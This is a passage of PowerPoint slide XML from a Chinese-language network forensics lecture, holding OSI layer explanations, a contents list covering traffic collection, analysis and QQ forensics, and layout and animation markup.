          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3240" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>谢谢观赏  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3240" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>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1403648" y="1882584"/>
            <a:ext cx="3829973" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="003466"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="0"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286500" y="2323465"/>
            <a:ext cx="2787650" cy="2012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40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20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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20"/>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7" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="18" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="23" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="24" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="25" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="26" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="27" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="19" grpId="0" bldLvl="0" animBg="1"/>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 TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基础</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1275606"/>
            <a:ext cx="7165712" cy="1360805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据链路层</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(data link layer)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：数据链路层传输数据的单位是帧，数据链路层把一条有可能出差错的实际链路，转变成为让网络层向下看起来好像是一条不出差错的链路。</a:t>
            </a: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 TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基础</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1275606"/>
            <a:ext cx="7165712" cy="2700020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络层</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(network layer)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：网络层传输数据的单位是报文分组或包。网络层的任务是选择最佳的路由，使发送端传输层的报文能够正确无误地按照目的地址找到接收端，并交付给接收端的传输层。路由选择的好坏在很大程度上决定了网络的性能，如网络吞吐量（在一个特定的时间内成功发送数据包的数量），平均延迟时间、拥塞控制、资源的有效利用率等。</a:t>
            </a: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 TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基础</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1275606"/>
            <a:ext cx="7165712" cy="2700020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>传输层</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(transport layer)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：传输层传输数据的单位是报文。传输层正好是七层的中间一层，是通信子网（下面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>层）和资源子网（上面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>层）的分界线，它屏蔽通信子网的不同，使高层用户感觉不到通信子网的存在。它完成资源子网中两结点的直接逻辑通信，实现通信子网中端到端的透明传输。</a:t>
            </a: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 TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基础</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1275606"/>
            <a:ext cx="7165712" cy="2053590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>会话层</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(session layer)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：会话层的主要功能是在不同主机的各种进程间进行会话，目的是完成正常的数据交换，并提供了对某些应用的增强服务会话，也可被用于远程登录到分时系统或在两个机器间传递文件。</a:t>
            </a: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 TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基础</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1275606"/>
            <a:ext cx="7165712" cy="3669665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>表示层</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(presentation layer)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：在计算机与计算机用户之间进行数据交换时，不同的计算机可能采用不同的编码方法来表示数据的类型和结构，为让采用不同编码方法的计算机能够进行交互通信，能相互理解所交换数据的值，可以采用抽象的标准法来定义数据结构，并采用标准的编码形式。表示层管理这些抽象数据结构，并且在计算机内部表示和网络的标准表示法之间进行转换，也即表示层关心的是数据传送的语义和语法两个方面的内容。但表示层仅完成语法的处理，而语义的处理是由应用层来完成的。表示层的另一功能是数据的加密和解密。</a:t>
            </a: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3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3090661" y="111286"/>
            <a:ext cx="4407137" cy="518637"/>
            <a:chOff x="5013673" y="1556817"/>
            <a:chExt cx="5976664" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="对角圆角矩形 72"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5013673" y="1556817"/>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 网络取证的定义和特点</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="74" name="对角圆角矩形 73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5084934" y="1628205"/>
              <a:ext cx="792126"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6.1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="75" name="组合 74"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3090659" y="713261"/>
            <a:ext cx="4407136" cy="518637"/>
            <a:chOff x="5013499" y="1556792"/>
            <a:chExt cx="5976664" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="76" name="对角圆角矩形 75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5013499" y="1556792"/>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  TCP/IP基础</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="对角圆角矩形 76"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5093544" y="1628205"/>
              <a:ext cx="792127"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6.2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977950" y="3077324"/>
            <a:ext cx="1568989" cy="757130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4320" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003466"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>目 录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1268393" y="3772248"/>
            <a:ext cx="989373" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003466"/>
                </a:solidFill>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003466"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="0"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="239395" y="958850"/>
            <a:ext cx="3044825" cy="2197735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3090661" y="1313341"/>
            <a:ext cx="4407137" cy="518637"/>
            <a:chOff x="4946504" y="379652"/>
            <a:chExt cx="5976664" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="对角圆角矩形 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4946504" y="379652"/>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 网络取证数据源</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="对角圆角矩形 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5017765" y="451745"/>
              <a:ext cx="792126"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6.3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3090661" y="1916591"/>
            <a:ext cx="4407137" cy="518637"/>
            <a:chOff x="5013673" y="1556817"/>
            <a:chExt cx="5976664" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="对角圆角矩形 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5013673" y="1556817"/>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 网络通信数据的收集</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="对角圆角矩形 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5084934" y="1628205"/>
              <a:ext cx="792126"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6.4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3090661" y="2519206"/>
            <a:ext cx="4407137" cy="518637"/>
            <a:chOff x="5013673" y="1556817"/>
            <a:chExt cx="5976664" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="对角圆角矩形 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5013673" y="1556817"/>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 网络通信数据的检查与分析</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="对角圆角矩形 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5084934" y="1628205"/>
              <a:ext cx="792126"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6.5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3090661" y="3156746"/>
            <a:ext cx="4407137" cy="518637"/>
            <a:chOff x="4946504" y="379652"/>
            <a:chExt cx="5976664" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="对角圆角矩形 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4946504" y="379652"/>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 网络取证与分析实例</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="对角圆角矩形 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5017765" y="451745"/>
              <a:ext cx="792126"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6.6</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3090661" y="3772696"/>
            <a:ext cx="4407137" cy="518637"/>
            <a:chOff x="5013673" y="1556817"/>
            <a:chExt cx="5976664" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="对角圆角矩形 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5013673" y="1556817"/>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 QQ取证</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="对角圆角矩形 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5084934" y="1628205"/>
              <a:ext cx="792126"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6.7</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3090661" y="4396901"/>
            <a:ext cx="4407137" cy="518637"/>
            <a:chOff x="5013673" y="1556817"/>
            <a:chExt cx="5976664" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="对角圆角矩形 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5013673" y="1556817"/>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 小结</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="对角圆角矩形 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5084934" y="1628205"/>
              <a:ext cx="792126"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6.8</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="72"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="72"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
